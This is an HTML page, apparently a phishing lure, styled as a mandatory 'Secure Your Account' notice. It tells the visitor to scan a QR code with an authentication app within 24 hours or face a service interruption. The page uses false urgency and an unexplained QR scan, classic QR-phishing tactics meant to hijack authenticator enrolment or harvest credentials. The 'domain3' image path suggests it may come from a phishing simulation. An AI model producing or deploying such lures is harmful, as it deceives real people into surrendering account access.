<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Important Security Update</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 40px; text-align: center; background-color: #f4f4f4; }
        .container { background-color: #fff; padding: 30px; border-radius: 8px; box-shadow: 0 0 15px rgba(0,0,0,0.1); display: inline-block; }
        h1 { color: #333; }
        p { color: #555; line-height: 1.6; }
        .qr-code { margin-top: 20px; margin-bottom: 20px; }
        .note { color: #d9534f; font-weight: bold; }
    </style>
</head>
<body>
    <div class="container">
        <h1>Action Required: Secure Your Account</h1>
        <p>To ensure the continued security of your account and to enable new security features, please scan the QR code below with your authentication application.</p>
        <div class="qr-code">
            <img src="/static/domain3_qr.png" alt="QR Code for Security Update">
        </div>
        <p class="note">This is a mandatory security update. Please complete this action within the next 24 hours to avoid any service interruption.</p>
        <p>Thank you for your cooperation.</p>
    </div>
</body>
</html>